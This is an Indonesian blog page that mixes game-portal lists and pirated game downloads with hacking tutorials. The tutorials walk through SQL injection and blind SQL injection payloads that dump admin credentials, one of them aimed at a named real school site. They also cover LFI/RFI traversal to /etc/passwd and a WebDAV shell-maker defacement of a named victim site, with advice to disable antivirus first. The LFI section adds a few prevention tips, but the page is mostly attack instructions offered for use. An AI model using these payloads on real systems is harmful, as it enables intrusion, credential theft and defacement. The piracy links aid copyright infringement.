Selamat Datang Di Cs , Jangan Lupa Di Like Fanspage nya ------------------------ Unknown- Cs --------------------------- Created by : unknown -------------

8 Portal Game Di Indonesia

1. LytoGame : Ragnarok
                         Anime Fighter
                         Seal Indonesi
                         RF Online
                         Idol Street
                         Perfect World
                         Crazy Kart 2
                         Rohan
                         Cross Fire
                         Avalon
                         Jade Dynasti
                         Forsaken World
                         S4 League 
                         Legenda Naga
                         Ragnarok 2


2. Gemscool : Point Blank
                        3 Online
                        Atlantica
                        Yulgang Online
                        Lost Saga
                        Free Style
                        Mirror War
                        Dragon Nest
                        Eligium
                        Cabal
                        Age Of Wushu
                        Kart Rider

3.Megaxus : Audition Ayo Dance
                      Lineage II
                      War Rock
                      Grand Chase
                      Counter Strike Online
                      SD Gundam
                      Ayo Oke
                      Royal Master

4.Netmarble : Elword Indonesia
                        Modoo Marble
                        Chagu Chagu
                        Race Cha-Cha-Cha

5.Game Web : Opkita
                         Ninjakita

6.Web Game : Tale Of New Gokong
                         Pendekar Naga
                         Etornal Chronice
                         Liga Soccer

7.Faveoe : SkyWind Heroes
                  Dynasti War
                  Free Jack

8.Prodigy : Battle Of The immortal
                   Legend Of 3 Kingdom
                   Warrior King
                   War Of The Immortal
                   Canaan Online
                   Pirate King
                   Anime Pirate
                   Rise Of Europa
                   Anime Ninja
                   Ninja Online Indonesia

Mohon Maaf Jika Ada Kesalahan Ataupun Kekurangan

Counter Strike Xreme v7

Download Counter Strike Extreme V7 Full Version 
   saya akan share game Counter Strike Extreme v7 atau sering akrab dengan disingkat menjadi CS Extreme v7 merupakan game ber-genre FPS yang sangat seru untuk dimainkan.
Didalam Counter Strike Extreme v7 ini ada penambahan beberapa fitur terbaru, misalnya Alien Mode, Tampilan baru, MAp baru, Karakter dan hero Zombie baru dan beberapa fitur terbarunya yang bisa kalian lihat sendiri.

Screenshot:

Counter Strike Extreme V7 Full Version
CS Extreme V7 Full Version
System Minimum Requirements CS Extreme V7:
  • OS: Windows XP/7/Vista
  • RAM: 1GB RAM
  • VGA: 518MB+
  • Hard Disc Space: 2GB+
Link Download (4Part) :
DOWNLOAD
New Link (4Shared) Karena di mediafire mudah mati linknya ...
Part1 Part2 Part3 Part4

pass RAR : www.wcg-games.blogspot.com

Tunggu 5 Detik dan Tekan SKIP AD/LEWATI Jika ada ADF.LY

CARA MENGGUNAKAN HJSPLIT <<< KLIK

Cara Install:
  1. Download dulu semua partnya (4Part).
  2. Satukan Semua Part tersebut dalam 1 Folder kosong yang sama.
  3. Kemudian Ekstrak File CS-Extreme V7 Beta part1
  4. Gabungkan Dengan HjSplit
  5. Buka "CSExtremeV7.0 Setup" Untuk menginstall.
  6. Install Seperti biasa.
  7. Selesai.. Mudah bukan? 

  Sekian postingan saya kali ini  semoga bermanfaat dan jika ada pertanyaan silahkan tinggalkan komentar kalian.

Teknik Manual SQL Injection


Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name
  • ,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name)
  • ,6,7,8+from+information_schema. ​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name)
  • ,6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name)
  • ,6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password)
  • ,6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Download Free Game Ps2 : File ISO

Pada kesempatan kali ini saya coba menyediakan beberapa Game PS2 file ISO yang bisa di download secara Gratis, file-file ini tinggal Anda download dan extract lalu anda burn pada media DVD dengan menggunakan aplikasi apa aja yang anda kuasai,berikut file-filenya:

1.
GTA 3 PS2.is.torrent

GTA 3 PS2.is.torrent

2. BLACK PS2.iso.torrent

BLACK PS2.iso.torrent

3. GTA SAN ANDREAS PS2.iso.torrent
GTA SAN ANDREAS PS2.iso.torrent
4. MARVEL vs CAPCON.iso.torrent
MARVEL vs CAPCON.iso.torrent


5.
GTA VICE CITY.iso.torrent
GTA VICE CITY.iso.torrent

6. FinalFantasyX-2_Eng-Pal-Ps2_iso.torrent
FinalFantasyX-2_Eng-Pal-Ps2_iso.torrent

 
*** UPDATE ***
Untuk 2 file dibawah ini masih dalam tahap uji coba,apabila  berhasil maka akan saya tambah kan lebih banyak file-file PS2 lainya. Oleh sebab itu partisipasi dari pengunjung sangat saya harapkan yaitu dengan memberitahukan pada saya apabila anda men-downloadnya,apakah berhasil atau tidak, berhasil atau tidaknya tolong beritahu saya pada kotak komentar,sebelumnya terimakasih atas partisipasi anda...!

7.
Downhill Domination.iso.torrent
Downhill Domination.iso.torrent


8.
Naruto 4.iso.torrent
Naruto 4.iso.torrent


9. Call of Duty 3.iso-torrent
Call of Duty 3.iso-torrent

10. Metal Gear Solid 3.iso-torrent
Metal Gear Solid 3.iso-torrent

11. Burnout Takedown 3.iso-torrent
Burnout Takedown 3.iso-torrent


12. 007 Everythng or Nothing.iso-torrent 
007 Everythng or Nothing.iso-torrent

13. Pes2013.iso-torrent
Pes2013.iso-torrent


14. Hunter The Reckoning WayWard.iso-torrent 
Hunter The Reckoning WayWard.iso-torrent

15. Jackie Chan Adventures.iso-torrent 
 Jackie Chan Adventures.iso-torrent

16. Kings Field 4.iso-torrent
Kings Field 4.iso-torrent

17. PlayBoy The Mansion.iso-torrent
PlayBoy The Mansion.iso-torrent

18. Ghost Rider.iso-torrent
Ghost Rider.iso-torrent

19. God Of  War.iso-torrent
God Of  War.iso-torrent

20. Transformer Revenge of the Fallen.iso-torrent
Transformer Revenge of the Fallen.iso-torrent

21. Spiderman 3.iso-torrent
Spiderman 3.iso-torrent

Blind SQL Injection



Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

 Apa sich Blind SQL Injection tu?



Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql inject

Cara Deface dengan LFI/RFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:




Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

Cara deface web dengan webdav buatan Hmei7 dan Lengkap step by step

Assalamualaikum Wr.Wb

Sesuai dengan judul posting kali ini , saya akan memberikan tutorial deface website menggunakan Webdav buatan Hmei7 . Sebenarnya tutorial ini sudah banyak sekali di mbah google , namun karena saya hanya ingin berbagi kepada yang belum bisa alangkah baiknya saya menuliskan tutorial ini . Langsung saja kita ke tutorial deface website menggunakan software Webdav .

Pertama , kalian harus download dulu software webdavnya di link dibawah ini :

Download Webdav via Mediafire ( 80 KB )

Setelah selesai download kalian matikan dulu anti virus di komputer / laptop anda ( supaya software bisa dibuka ) selanjutnya tinggal kalian buka filenya .

Kalau sudah dibuka tinggal klik tulisan " Webdav " lalu klik " Asp shell maker "


Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting ( untuk mengedit file / shell anda ) "
Setelah klik tulisan "Setting" edit tulisan /Hmei7.asp;.txt dengan tulisan anda contohnya ( /bLacK_.asp;.txt
 
sebenarnya tidak usah diedit juga tidak masalah ) setelah kalian edit tulisannya tinggal masukan target web / site korban . Caranya tinggal klik " Add Site " lalu masukan site korban ( contoh : http://www.odelagrange.com/ ) Jika sudah dimasukan web korban tinggal klik "Serang" ( tunggu sampai ada notice )
 checking : http://odelagrange.com
    shell created !!
    http://odelagrange.com/bLacK_.asp;.txt
Jika sudah muncul tulisannya tinggal copy hasil defacenya ( contoh : http://odelagrange.com/bLacK_.asp;.txt ) lanjut ke step berikutnya . Jika sudah dicopy tinggal paste di address bar anda ( Mozila , Google Chrome , IE , Opera Mini , dll ) lalu tekan enter .
Lalu setelah itu anda akan dialihkan ke situs http://odelagrange.com/bLacK_.asp;.txt dan saatnya anda untuk beraksi . Anda cari tulisan ( index.asp / index.html / index.htm / index.php / yang berhubungan dengan index gunakan ctrl+f supaya lebih mudah mencari ) pada contoh web http://odelagrange.com/bLacK_.asp;.txt ada tulisan " index.html " . 
Selanjutnya anda tinggal mengedit (klik gambar tanda seru untuk mengedit , jangan klik selain gambar itu ) data yang ada didalam file " index.html " dengan file / script deface anda ( jika belum punya silahkan 
download disini ) lalu klik " Kaydet / Save " . 
Jika data berhasil diedit maka ada tulisan " File Edited Successful:) " . 
Selamat anda telah berhasil mendeface website http://odelagrange.com Jika sudah success tinggal anda edit link / site target ( contoh : http://odelagrange.com/index.html biasanya jika /index.html dll bisa kena index dari web tersebut ) kemudian tekan enter di address bar anda . Jika halaman dari http://odelagrange.com/index.html berhasil maka akan ada script anda di web itu .
Jika anda ingin mencoba mengetahui apakah anda berhasil mendeface INDEX dari web tersebut caranya tinggal hapus saja tulisan /index.html (  contoh http://odelagrange.com/index.html ->
http://odelagrange.com/ )
NB : Jika masih belum mengerti bisa tuliskan yang belm dimengerti di kolom komentar .
Jika anda berhasil jangan lupa simpan nama bLacK_peArL di hasil deface / script anda , Terima Kasih .
" Tutorial di blog ini hanya sebagai pembelajaran , jadi jangan disalahgunakan "

- Copyright © ------------------------ Unknown- Cs --------------------------- Created by : unknown ------------- - Jailbreak Matrix Anonymous - Powered by Blogger - Designed by SaintBracked -